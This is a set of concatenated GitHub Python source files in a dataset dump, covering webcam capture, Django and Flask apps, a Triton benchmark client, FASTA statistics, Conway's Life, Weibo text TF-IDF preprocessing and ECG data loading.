255), 2, cv2.LINE_AA)\n # Save Results to CSV\n body_language_class_list.insert(0,user)\n with open ('rs.csv', mode = 'a', newline='') as f:\n csv_writer=csv.writer(f, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow(body_language_class_list)\n\n except:\n pass\n \n if frame is not None:\n cv2.imshow('Capture', image)\n if body_language_class == 'Khochiu':\n ret, img = self.cam.read()\n if ret:\n now = datetime.datetime.now()\n date = now.strftime('%Y%m%d')\n hour = now.strftime('%H%M%S')\n user_id = '00001'\n filename = './images/cvui_{}_{}_{}.png'.format(date, hour, user_id)\n cv2.imwrite(filename, img)\n self.image_queue.put_nowait(filename)\n print('took photo')\n key = cv2.waitKey(1)\n if key == ord('q'):\n # q : close\n self.release()\n cv2.destroyAllWindows()\n break\n\n elif key == ord('z'):\n # z : zoom - in\n self.zoom_in()\n\n elif key == ord('x'):\n # x : zoom - out\n self.zoom_out()\n \n \n \n def release(self):\n self.cam.release()\n cv2.destroyAllWindows()\n\ncam=Camera(mirror=True)\ncam.stream()\ncam.show()","repo_name":"NorG0/MyProject2","sub_path":"Final_Model.py","file_name":"Final_Model.py","file_ext":"py","file_size_in_byte":10852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27401013475","text":"import os\nimport sys\nimport csv\nimport torch\nfrom torch import nn\nimport cv2\nimport argparse\nimport time\n\n\n# sys.path.append('../..')\n# 
sys.path.append(os.getcwd())\n\n\n# from Module.Data.Base_lmdb_entery import Image_entery\n# from Module.Data import iframe_720x1280_dataset\nparser = argparse.ArgumentParser(prog=os.path.basename(__file__), description=\"read the saving path and frame rate and resolution\")\n\nparser.add_argument('--save_path', type=str, required=True)\nparser.add_argument('--fps', type=int, required=True, default=30)\nparser.add_argument('--width', type=int, default=640)\nparser.add_argument('--height', type=int, default=480)\n\nargs = parser.parse_args()\n\n\nif __name__ == '__main__':\n print(42)\n # new_db_path = '/home/hasadi/project/cameranoiseprint/data'\n # new_db_name = 'vision_720x1280'\n # new_db = os.path.join(new_db_path, new_db_name)\n\n # dataset = iframe_720x1280_dataset.VideoData(db_path=new_db_path, db_name=new_db_name, crop_size=(510, 510), fup=3)\n \n # print(len(dataset))\n \"\"\"\n camera final resolution \n 1280.0 960.0\n \"\"\"\n\n saving_path = os.path.join(os.getcwd(), args.save_path)\n txt_path = os.path.dirname(saving_path)\n if not os.path.exists(saving_path):\n os.makedirs(saving_path)\n\n cam = cv2.VideoCapture(0)\n\n cam.set(cv2.CAP_PROP_FPS, args.fps)\n cam.set(cv2.CAP_PROP_FRAME_WIDTH, args.width)\n cam.set(cv2.CAP_PROP_FRAME_HEIGHT, args.height)\n\n if not cam.isOpened():\n print(\"cam is not open\")\n else:\n # cam.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n # cam.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n frame_id = 0\n with open(os.path.join(txt_path, 'timestame.txt'), 'w') as f:\n with open(os.path.join(txt_path, 'data.csv'), 'w', newline='\\n') as f_data:\n writer = csv.writer(f_data)\n while(True):\n # Capture frame-by-frame\n ret, frame = cam.read()\n time_stamp = time.time_ns()\n f.write(f'{time_stamp}\\n')\n writer.writerow([time_stamp, f'{time_stamp}.png'])\n # Display the resulting frame\n cv2.imshow('preview',frame)\n cv2.imwrite(os.path.join(saving_path, f'{time_stamp}.png'), frame)\n\n # Waits for a user input to quit the application\n # frame_id += 1\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break","repo_name":"hamzeasadi/cameranoiseprint","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36825805076","text":"sh = input('Enter Hours: ')\nsr = input('Enter Rate: ')\ntry:\n fh = float(sh)\n fr = float(sr)\nexcept:\n print('Error, please enter numeric input')\n\nquit()\n#print(fh, fr)\nif fh > 40:\n regular = fh * fr\n otp = (fh - 40) * (fr * 0.5)\n xp = regular + otp\nelse :\n xp = fh * fr\nprint('Pay:',xp)","repo_name":"colloso999/Python","sub_path":"Chapter3_ConditionalExecution/Ex_03_02/Ex_03_02.py","file_name":"Ex_03_02.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72096467308","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .views import home , adminloginview, adminhomepage, adminauthenticateview, adminlogout, addpizza, deletepizza, homepageview, signupuser, userloginview, customerpage, userauthenticate, userlogout,placeorder, myorders, adminorders,acceptorder,declineorder\n\n\nurlpatterns = [\n#-----Admin URLS -------#\n\tpath('admin/', adminloginview, name= 'adminloginview'),\n\tpath('adminauthenticateview', adminauthenticateview, name= 'adminauthenticateview'),\n\tpath('admin/homepage/', adminhomepage, name= 'adminhomepage'),\n\tpath('adminlogout/', adminlogout, 
name='adminlogout'),\n\tpath('addpizza/', addpizza, name='addpizza'),\n\tpath('deletepizza//', deletepizza, name='deletepizza'),\n\tpath('adminorders/', adminorders, name= 'adminorders'),\n\tpath('acceptorder//', acceptorder, name='acceptorder'),\n\tpath('declineorder//', declineorder, name='declineorder'),\n#---------Customer URLS------------#\n\tpath('', homepageview, name='homepageview'),\n\tpath('signupuser/', signupuser, name=\"signupuser\"),\n\tpath('loginuser/', userloginview, name = 'userloginview'),\n\tpath('userauthenticate/', userauthenticate, name= 'userauthenticate'),\n\tpath('customer/welcome/', customerpage, name= 'customerpage'),\n\tpath('userlogout/', userlogout, name='userlogout'),\n\tpath('placeorder/', placeorder, name = 'placeorder'),\n\tpath('myorders/', myorders, name= 'myorders'),\n\t]","repo_name":"gunarevuri/Pizza-ordering-Django","sub_path":"pizzaapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71584826346","text":"# -*- coding: utf-8 -*-\nimport sys\n\nsys.path.append(\"/\")\n\nfrom app.shared.models import db\nfrom app.models.brand import Brand\nfrom app.models.discount_code import DiscountCode\nfrom app.models.user import User\nfrom app.manage import app\n\n\ndef seed():\n a = User(name=\"user\", surname=\"test\", email=\"a@a.com\")\n a.save()\n brand = Brand(name=\"papple\")\n brand.save()\n code = DiscountCode(code=\"m1macio\", brand_id=brand.id)\n code.save()\n\n\ndef truncate_all():\n models = [DiscountCode, Brand, User]\n for model in models:\n db.session.query(model).delete()\n db.session.commit()\n\n\nif __name__ == \"__main__\":\n with app.app_context():\n truncate_all()\n seed()\n","repo_name":"ByK95/discount_code","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"424816380","text":"from django.conf.urls import patterns, url\n\nfrom portfolio.views import (ArtifactDetail, ArtifactList, ProjectDetail,\n ProjectList, CategoryDetail, CategoryList)\n\nurlpatterns = patterns(\n '',\n url(r'^(?P[-\\w]+)/projects/(?P[-\\w]+)/pages/'\n '(?P[-\\w]+)/$', ArtifactDetail.as_view(),\n name='artifact_detail'),\n url(r'^(?P[-\\w]+)/projects/(?P[-\\w]+)/'\n 'pages/$', ArtifactList.as_view(), name='artifact_list'),\n url(r'^(?P[-\\w]+)/projects/(?P[-\\w]+)/$',\n ProjectDetail.as_view(), name='project_detail'),\n url(r'^(?P[-\\w]+)/projects/$', ProjectList.as_view(),\n name='project_list'),\n url(r'^(?P[-\\w]+)/$', CategoryDetail.as_view(),\n name='category_detail'),\n url(r'^$', CategoryList.as_view(),\n name='category_list'),\n\n)\n","repo_name":"raymcbride/django-portfolio","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25173168838","text":"import argparse\nimport logging\nimport time\nimport typing\n\nimport numpy as np\nimport tritonclient.grpc as triton\nfrom stillwater import (\n DummyDataGenerator,\n MultiSourceGenerator,\n ThreadedMultiStreamInferenceClient\n)\nfrom stillwater.utils import ExceptionWrapper\nfrom stillwater.client.monitor import ClientStatsMonitor\n\n\ndef main(\n url: str,\n model_name: str,\n model_version: int,\n num_clients: int,\n sequence_id: int,\n generation_rate: float,\n num_iterations: int = 10000,\n 
warm_up: typing.Optional[int] = None,\n filename: typing.Optional[str] = None\n):\n client = ThreadedMultiStreamInferenceClient(\n url=url,\n model_name=model_name,\n model_version=model_version,\n qps_limit=generation_rate,\n name=\"client\"\n )\n\n output_pipes = {}\n for i in range(num_clients):\n seq_id = sequence_id + i\n\n sources = []\n for state_name, shape in client.states.items():\n sources.append(DummyDataGenerator(\n shape=shape,\n name=state_name,\n ))\n source = MultiSourceGenerator(sources)\n pipe = client.add_data_source(source, str(seq_id), seq_id)\n output_pipes[seq_id] = pipe\n\n warm_up_client = triton.InferenceServerClient(url)\n warm_up_inputs = []\n for input in client.model_metadata.inputs:\n x = triton.InferInput(input.name, input.shape, input.datatype)\n x.set_data_from_numpy(np.random.randn(*input.shape).astype(\"float32\"))\n warm_up_inputs.append(x)\n\n for i in range(warm_up):\n warm_up_client.infer(model_name, warm_up_inputs, str(model_version))\n\n logging.info(\n f\"Gathering performance metrics over {num_iterations} iterations\"\n )\n\n num_packages_received = 0\n bars = \"|\" + \" \" * 25 + \"|\"\n max_msg = f\" {num_iterations}/{num_iterations}\"\n max_len = len(bars) + len(max_msg)\n\n client.start()\n try:\n while True:\n for seq_id, pipe in output_pipes.items():\n if not pipe.poll():\n continue\n x = pipe.recv()\n if isinstance(x, ExceptionWrapper):\n x.reraise()\n num_packages_received += 1\n if num_packages_received >= num_iterations:\n break\n\n num_equal_signs = num_packages_received * 25 // num_iterations\n num_spaces = 25 - num_equal_signs\n msg = \"|\" + \"=\" * num_equal_signs + \" \" * num_spaces + \"|\"\n msg += f\" {num_packages_received}/{num_iterations}\"\n num_spaces = \" \" * (max_len - len(msg))\n print(msg + num_spaces, end=\"\\r\", flush=True)\n finally:\n client.stop()\n client.join(1)\n try:\n client.close()\n except ValueError:\n client.terminate()\n time.sleep(0.1)\n client.close()\n logging.warning(\"Client closed ungracefully\")\n\n if filename is None:\n return\n\n # this is lazy since it's really just going\n # from one queue to another but it's less code\n # to write so whatever\n monitor = ClientStatsMonitor(client, filename)\n monitor.start()\n while not client._metric_q.empty():\n time.sleep(0.1)\n monitor.stop()\n monitor.join(0.1)\n monitor.close()\n return monitor.output_file\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n client_parser = parser.add_argument_group(\n title=\"Client\",\n description=(\n \"Arguments for instantiation the Triton \"\n \"client instance\"\n )\n )\n client_parser.add_argument(\n \"--url\",\n type=str,\n default=\"localhost:8001\",\n help=\"Server URL\"\n )\n client_parser.add_argument(\n \"--model-name\",\n type=str,\n default=\"gwe2e\",\n help=\"Name of model to send requests to\"\n )\n client_parser.add_argument(\n \"--model-version\",\n type=int,\n default=1,\n help=\"Model version to send requests to\"\n )\n client_parser.add_argument(\n \"--sequence-id\",\n type=int,\n default=1001,\n help=\"Sequence identifier to use for the client stream\"\n )\n\n data_parser = parser.add_argument_group(\n title=\"Data\",\n description=\"Arguments for instantiating the client data sources\"\n )\n data_parser.add_argument(\n \"--generation-rate\",\n type=float,\n required=True,\n help=\"Rate at which to generate data\"\n )\n\n runtime_parser = parser.add_argument_group(\n title=\"Run Options\",\n description=\"Arguments parameterizing client run\"\n )\n 
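    # Illustrative invocation (these flag values are examples, not defaults):
    #   python main.py --generation-rate 4000 --num-iterations 10000 \
    #       --num-clients 4 --warm-up 50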
runtime_parser.add_argument(\n \"--num-iterations\",\n type=int,\n default=10000,\n help=\"Number of requests to get for profiling\"\n )\n runtime_parser.add_argument(\n \"--num-clients\",\n type=int,\n default=1,\n help=\"Number of clients to run simultaneously\"\n )\n runtime_parser.add_argument(\n \"--warm-up\",\n type=int,\n default=None,\n help=\"Number of warm up requests to make\"\n )\n runtime_parser.add_argument(\n \"--file-prefix\",\n type=str,\n default=None,\n help=\"Prefix to attach to monitor files\"\n )\n runtime_parser.add_argument(\n \"--queue-threshold-us\",\n type=float,\n default=100000,\n help=\"Maximum allowable queuing time in microseconds\"\n )\n runtime_parser.add_argument(\n \"--latency-threshold\",\n type=float,\n default=1.,\n help=\"Maximum allowable end-to-end latency in seconds\"\n )\n runtime_parser.add_argument(\n \"--log-file\",\n type=str,\n default=None,\n help=\"Optional log file to write to\"\n )\n flags = vars(parser.parse_args())\n\n log_file = flags.pop(\"log_file\")\n if log_file is not None:\n logging.basicConfig(filename=log_file, level=logging.INFO)\n else:\n import sys\n logging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\n try:\n main(**flags)\n except Exception:\n logging.exception(\"Fatal error\")\n raise\n","repo_name":"alecgunny/benchmark-ligo-py","sub_path":"expts/offline/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27186128046","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\nmokh_db = pd.read_csv('all_data/tables/mokh.csv', index_col=0)\n\nstatistics = {'None': 0}\n\n\n\nfor index, row in mokh_db.iterrows():\n print(index, row['gene'])\n if type(row['gene']) == float:\n statistics['None'] += 1\n elif row['gene'] == 'None':\n statistics['None'] += 1\n else:\n biotype = row['gene'].split(',')[1].split(':')[1]\n print(biotype)\n\n if biotype in statistics.keys():\n statistics[str(biotype)] += 1\n else:\n statistics[biotype] = 1\n print(statistics)\n print('\\n')\n \nsizes = list(statistics.values())\n\nlabels = list(statistics.keys())\nlabels2 = []\n\nfor i in labels:\n labels2.append(str(i) + ': ' + str(statistics[i]))\n \n \n \nfig, ax = plt.subplots(figsize=(24, 12), subplot_kw=dict(aspect=\"equal\"))\n\nwedges, texts = ax.pie(sizes, wedgeprops=dict(width=0.5), startangle=-40)\n\nbbox_props = dict(boxstyle=\"round,pad=0.3\", fc=\"w\", ec=\"k\", lw=0.9)\nkw = dict(arrowprops=dict(arrowstyle=\"-\"),\n bbox=bbox_props, zorder=0, va=\"center\", size=15)\n\nfor i, p in enumerate(wedges):\n ang = (p.theta2 - p.theta1)/2. 
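The wedge-label placement computed in the annotation loop here takes each wedge's angular midpoint and projects it onto the unit circle; the same math, isolated as a small helper (a sketch):

import numpy as np

def wedge_anchor(theta1: float, theta2: float):
    # Midpoint angle of the wedge in degrees, then unit-circle coordinates.
    ang = (theta2 - theta1) / 2.0 + theta1
    return np.cos(np.deg2rad(ang)), np.sin(np.deg2rad(ang))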
+ p.theta1\n y = np.sin(np.deg2rad(ang))\n x = np.cos(np.deg2rad(ang))\n horizontalalignment = {-1: \"right\", 1: \"left\"}[int(np.sign(x))]\n connectionstyle = \"angle,angleA=0,angleB={}\".format(ang)\n kw[\"arrowprops\"].update({\"connectionstyle\": connectionstyle})\n ax.annotate(labels2[i], xy=(x, y), xytext=(1.35*np.sign(x), 1.4*y),\n horizontalalignment=horizontalalignment, **kw)\n\nax.set_title(\"Eudicots-monocots dataset: functional annotation of Physcomitrella patens clusters\", size=25)\n\nplt.show()\nplt.savefig('statistics.png')","repo_name":"MarySelifanova/PlantLIMEs","sub_path":"scripts/spatial_annotation_pipeline/visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32186146787","text":"class view_config(object):\n venusian = venusian\n def __init__(self, **settings):\n if 'for_' in settings:\n if settings.get('context') is None:\n settings['context'] = settings['for_']\n self.__dict__.update(settings)\n\n def __call__(self, wrapped):\n settings = self.__dict__.copy()\n depth = settings.pop('_depth', 0)\n\n def callback(context, name, ob):\n config = context.config.with_package(info.module)\n config.add_view(view=ob, **settings)\n\n info = self.venusian.attach(wrapped, callback, category='pyramid',\n depth=depth + 1)\n\n if info.scope == 'class':\n if settings.get('attr') is None:\n settings['attr'] = wrapped.__name__\n\n settings['_info'] = info.codeinfo\n return wrapped\n","repo_name":"poros/talk-write-more-decorators-and-fewer-classes","sub_path":"intro/pyramid_internals.py","file_name":"pyramid_internals.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"9850172878","text":"import pygame\r\nimport board\r\nimport rules\r\n\r\nSCREEN_WIDTH = 100\r\nSCREEN_HEIGHT = 100\r\nTILE_SIZE = 1\r\nGAME_TICK = 20\r\nGAME_RULE = rules.CONWAY\r\nSEED_FRAC = 2\r\n\r\ndef render():\r\n screen.fill(0)\r\n state = gameBoard.board\r\n pixels = pygame.PixelArray(screen)\r\n for row in range(SCREEN_HEIGHT):\r\n for col in range(SCREEN_WIDTH):\r\n boardPos = gameBoard.asBoardPos((col, row))\r\n pixels[col, row] = int(state[boardPos]) * 0xAAAAAA\r\n pixels.close()\r\n\r\npygame.init()\r\nclock = pygame.time.Clock()\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), flags=pygame.SCALED)\r\nrunning = True\r\npaused = True\r\nclicking = False\r\ngameBoard = board.Board(SCREEN_WIDTH, SCREEN_HEIGHT, TILE_SIZE, GAME_RULE, SEED_FRAC)\r\n\r\nrender()\r\npygame.display.flip()\r\n\r\nwhile running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_SPACE:\r\n paused = True if paused == False else False\r\n if event.key == pygame.K_RETURN:\r\n gameBoard.initialize()\r\n if event.key == pygame.K_BACKSPACE:\r\n gameBoard.clear()\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n clicking = True\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n clicking = False\r\n gameBoard.clearMouseHistory()\r\n \r\n if clicking:\r\n gameBoard.handleMouse(pygame.mouse.get_pos())\r\n render()\r\n \r\n clock.tick(GAME_TICK)\r\n if paused == False:\r\n gameBoard.update()\r\n render()\r\n\r\n pygame.display.flip()\r\n 
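conway.py above delegates the update rule to board.Board; a self-contained sketch of one Game-of-Life step on a wrap-around grid (whether Board actually wraps its edges is an assumption):

import numpy as np

def conway_step(grid: np.ndarray) -> np.ndarray:
    # Sum the eight neighbours; np.roll wraps around, giving a toroidal board.
    neighbors = sum(
        np.roll(np.roll(grid, dy, axis=0), dx, axis=1)
        for dy in (-1, 0, 1) for dx in (-1, 0, 1)
        if (dy, dx) != (0, 0)
    )
    # A cell lives with exactly 3 neighbours, or 2 if it was already alive.
    return ((neighbors == 3) | ((grid == 1) & (neighbors == 2))).astype(grid.dtype)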
\r\npygame.quit()","repo_name":"kalmizyed/pygame-of-life","sub_path":"conway.py","file_name":"conway.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42837298560","text":"import argparse\nimport sys\nimport seqlib\n\nparser = argparse.ArgumentParser(description='read in a fasta file')\nparser.add_argument('--fasta', required=True, type=str)\narg = parser.parse_args()\n\n# prints the name of the file used as an argument input\nprint(arg.fasta)\n\n# in what other ways can i read the output of read_fasta()?\nprint('##### Total size ##########################')\ntotal_size = 0\nnum_contigs = 0\nlengths = []\nfor name, seq in seqlib.read_fasta(arg.fasta):\n\ttotal_size += len(seq)\n\tnum_contigs += 1\n\tlengths.append(len(seq))\nprint(total_size)\n\nprint('##### Number of contigs ###################')\nprint(num_contigs)\n\nprint('##### Shortest and longest contigs ########')\nlengths = sorted(lengths, reverse=True)\nprint('longest:', lengths[0])\nprint('shortest:', lengths[len(lengths) - 1])\n\nprint('##### Average and median contig sizes #####')\nprint('Avg:', sum(lengths)/len(lengths))\nif len(lengths)%2 == 0:\n\tprint('Med:', lengths[len(lengths)//2 - 1] + lengths[len(lengths)//2])\nelse:\n\tprint('Med:', lengths[(len(lengths) - 1)//2])\n\nprint('##### N50 #################################')\nhalf = sum(lengths)/2\nn = 0\ncontig = 0\nfor l in lengths:\n\tif n <= half:\n\t\tn += l\n\t\tcontig += 1\n\telse:\n\t\tprint(lengths[contig - 1])\n\t\tbreak\n\t\t\nprint('##### GC fraction #########################')\n# if i leave it as 'for seq in', it prints both the name and the seq\nind = []\nfor name, seq in seqlib.read_fasta(arg.fasta):\n\tfor p in range(len(seq)):\n\t\tind.append(seq[p])\n# same amount of nts here as in lengths\n# print(ind)\n# print(len(ind))\n\t\nGC = 0\nnotACTG = 0\nfor nt in ind:\n\tif nt == 'G' or nt == 'g' or nt == 'C' or nt == 'c':\n\t\tGC += 1\n\telif nt == 'A' or nt == 'a' or nt == 'T' or nt == 't':\n\t\tGC += 0\n\telse:\t\n\t\tnotACTG += 1\nprint(GC/(total_size - notACTG))\n\n\n# using count() is MUCH faster\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\t\n\n","repo_name":"icacedo/MCB198","sub_path":"genstats2.py","file_name":"genstats2.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72626587307","text":"# encoding:utf-8\n\nimport json\nimport jieba\nfrom sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer\nfrom sklearn.externals import joblib\n\n\n# 谣言语料库\ndef gen_corpus_of_rumor():\n corpus = []\n with open('../weibo_rumor_analysis/file/rumor_weibo_updated.json', 'r') as src:\n lines = src.readlines()\n for line in lines:\n rumor_dict = json.loads(line)\n reported_weibo = rumor_dict['reportedWeibo']\n if isinstance(reported_weibo, dict):\n corpus.append(reported_weibo['weiboContent'])\n else:\n corpus.append('[Error] ' + str(reported_weibo))\n with open('file/corpus/corpus_of_rumor.txt', 'w') as out:\n for c in corpus:\n out.write('{}\\n'.format(c))\n\n\n# 真实微博语料库\ndef gen_corpus_of_truth():\n corpus = []\n with open('../weibo_truth_analysis/file/weibo_truth.txt', 'r') as src:\n lines = src.readlines()\n for index_e, line in enumerate(lines):\n event_dict = json.loads(line)\n weibos = event_dict['weibo']\n for index_w, weibo in enumerate(weibos):\n if 'content' in weibo.keys():\n content = 
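The N50 loop in genstats2.py above walks the sorted lengths until the running sum passes half the total; the same computation reads more directly as (a sketch):

def n50(lengths):
    # N50: the contig length at which the cumulative sum of lengths, taken
    # longest first, first reaches half of the total assembly size.
    ordered = sorted(lengths, reverse=True)
    half, running = sum(ordered) / 2, 0
    for length in ordered:
        running += length
        if running >= half:
            return length

# n50([8, 5, 4, 2, 1]) == 5, since 8 + 5 = 13 reaches half of 20.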
weibo['content'].replace('\\t', '').replace('\\n', '').replace('\\r', '')\n corpus.append('({}, {}) : {}'.format(index_e, index_w, content))\n with open('file/corpus/corpus_of_truth.txt', 'w') as out:\n for c in corpus:\n out.write('{}\\n'.format(c))\n\n\n# 谣言语料库-分词\ndef cut_words_of_rumor():\n corpus = []\n with open('file/corpus/corpus_of_rumor.txt', 'r') as src:\n lines = src.readlines()\n for line in lines:\n seg_list = jieba.cut(line)\n result = ' '.join(seg_list)\n corpus.append(result)\n with open('file/corpus/cut_corpus_of_rumor.txt', 'w') as out:\n for c in corpus:\n out.write('{}'.format(c))\n\n\n# 真实微博语料库-分词\ndef cut_words_of_truth():\n corpus = []\n with open('file/corpus/corpus_of_truth.txt', 'r', encoding='utf-8') as src:\n lines = src.readlines()\n for line in lines:\n seg_list = jieba.cut(line)\n result = ' '.join(seg_list)\n corpus.append(result)\n with open('file/corpus/cut_corpus_of_truth.txt', 'w', encoding='utf-8') as out:\n for c in corpus:\n out.write('{}'.format(c))\n\n\n# 谣言语料库-得到tf-idf向量\ndef get_tf_idf_of_rumor(features_num=4000):\n corpus = []\n with open('file/corpus/cut_corpus_of_rumor.txt', 'r') as src:\n lines = src.readlines()\n for line in lines:\n corpus.append(line)\n print('The size of corpus is {}'.format(len(corpus)))\n\n vectorizer = CountVectorizer(max_features=features_num)\n transformer = TfidfTransformer()\n tf_idf = transformer.fit_transform(vectorizer.fit_transform(corpus))\n vocabulary = vectorizer.get_feature_names()\n\n joblib.dump((vocabulary, tf_idf), 'file/pkl/tf_idf_of_rumor_{}.pkl'.format(features_num))\n\n\n# 真实语料库-得到tf-idf向量\ndef get_tf_idf_of_truth(features_num=4000):\n corpus = []\n with open('file/corpus/cut_corpus_of_truth.txt', 'r', encoding='utf-8') as src:\n lines = src.readlines()\n for line in lines:\n corpus.append(line)\n print('The size of corpus is {}'.format(len(corpus)))\n\n vectorizer = CountVectorizer(max_features=features_num)\n transformer = TfidfTransformer()\n tf_idf = transformer.fit_transform(vectorizer.fit_transform(corpus))\n vocabulary = vectorizer.get_feature_names()\n\n joblib.dump((vocabulary, tf_idf), 'file/pkl/tf_idf_of_truth_{}.pkl'.format(features_num))\n\n# get_tf_idf_of_truth()\n","repo_name":"Ivan12138/RumorDataAnalysis","sub_path":"text_filtering/tf_idf_text_filtering_pre.py","file_name":"tf_idf_text_filtering_pre.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23955099175","text":"import os\nimport csv\nimport sys\nimport numpy as np\nimport scipy.io as sio\nfrom sklearn import preprocessing\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n#from DataSet import Bucket\n\ntrain_path = 'C:\\\\Users\\\\WeiLong\\\\PycharmProjects\\\\01-16\\\\training2017\\\\training2017'\nsave_path = 'C:\\\\Users\\\\liuNian\\\\PycharmProjects\\\\PaperTime'\ntest_path = 'C:\\\\Users\\\\WeiLong\\\\PycharmProjects\\\\01-16\\\\sample2017\\\\validation'\ndef label2num(element):\n if element == 'N':\n return 0\n elif element == 'O':\n return 1\n elif element == 'A':\n return 2\n elif element == '~':\n return 3\n\n# def label2onehot_ex(element):\n# if element == '1':\n# return [1,0,0,0,0]\n# elif element == '2':\n# return [0,1,0,0,0]\n# elif element == '3':\n# return [0,0,1,0,0]\n# elif element == '4':\n# return [0,0,0,1,0]\n# elif element == '5':\n# return [0,0,0,0,1]\n\ndef normalization(array):\n # mean = np.mean(array)\n # std = np.std(array,axis=0)\n # newarray = (array - mean) / std\n # return 
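The record above targets an older scikit-learn: sklearn.externals.joblib and get_feature_names() have since been removed (use the standalone joblib package and get_feature_names_out() instead). A sketch of the equivalent pipeline on current scikit-learn, with a toy corpus:

from sklearn.feature_extraction.text import TfidfVectorizer

# TfidfVectorizer combines CountVectorizer + TfidfTransformer in one estimator.
corpus = ["jieba cut weibo text", "another weibo text"]
vectorizer = TfidfVectorizer(max_features=4000)
tf_idf = vectorizer.fit_transform(corpus)
vocabulary = vectorizer.get_feature_names_out()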
np.reshape(newarray,[-1])\n return preprocessing.scale(array)\n\n\n# def get_label(label_path):\n#\n# def read_labels(label_path):\n# labels = []\n# with open(label_path) as file:\n# read = csv.reader(file)\n# for label_ in read:\n# labels.append(label_)\n# return labels\n#\n# labels = read_labels(label_path)\n# row = len(labels)\n# label = []\n# for i in range(row):\n# label.append(label2onehot(labels[i][1]))\n# return label\n\ndef get_label_For_DataSet(path):\n label = {}\n with open(path) as file:\n reader = csv.reader(file)\n for i in reader:\n label[i[0]] = label2num(i[1])\n return label\n\n\ndef get_mod(Size, cover, origin_length):\n cycle = Size - cover\n length = 0\n while (1):\n if length == 0:\n left = origin_length // Size\n right = origin_length % Size\n else:\n left = origin_length // cycle\n right = origin_length % cycle\n length += 1\n if left == 1:\n if right == 0:\n return length\n else:\n if right < (cycle / 2):\n return length\n else:\n return length + 1\n else:\n if left == 0:\n return -1\n if length == 1:\n origin_length -= Size\n else:\n origin_length -= cycle\n\ndef padding_zero(data, right, size, cover):\n if right != 0:\n pad_length = size - cover - right\n data = np.lib.pad(data, (0, pad_length), 'constant', constant_values=(0, 0))\n return data\n\ndef preprocessTrainData(train_path):\n label = get_label_For_DataSet(os.path.join(train_path, 'REFERENCE.csv'))\n train_mat = os.listdir(train_path)\n train_data = []\n train_label = []\n for i in train_mat:\n if '.mat' in i:\n file = sio.loadmat(os.path.join(train_path, i))\n normalized_data = normalization(file['val'][0])\n train_data.append(normalized_data)\n #print(len(normalized_data))\n file_index = i[0:6]\n train_label.append(label[file_index])\n return train_data,train_label\n\ndef preprocessTestData(test_path):\n label = get_label_For_DataSet(os.path.join(test_path, 'REFERENCE.csv'))\n mat = os.listdir(test_path)\n test_data = []\n test_label = []\n for i in mat:\n if '.mat' in i:\n file = sio.loadmat(os.path.join(test_path, i))\n data = normalization(file['val'][0])\n test_data.append(data)\n file_index = i[0:6]\n test_label.append(label[file_index])\n return test_data,test_label\n\ndef readTrain(train_path,Size=300,cover=50):\n train_data, train_label = preprocessTrainData(train_path)\n train_length = []\n #########train_length#########\n for i in train_data:\n train_length.append(get_mod(Size,cover,len(i)))\n Max = Size + (np.max(train_length)-1)*(Size-cover)\n for i in range(len(train_data)):\n train_data[i] = np.lib.pad(train_data[i],(0,np.max((0,Max-len(train_data[i])))),'constant',constant_values=(0,0))\n new_train = []\n start = 0\n for index in range(len(train_data)):\n for i in range(np.max(train_length)):\n if i == 0:\n end = start + Size\n new_train.append(train_data[index][start:end])\n else:\n start = end - cover\n end = start + Size\n new_train.append(train_data[index][start:end])\n train = []\n assert len(train_data) == len(train_label)\n for i in range(len(train_data)):\n train.append((train_data[i],train_label[i],train_length[i]))\n return train\n\ndef readTest(test_path,Size=300,cover=50):\n test_data, test_label = preprocessTestData(test_path)\n test_length = []\n # #---Test---\n # for i in 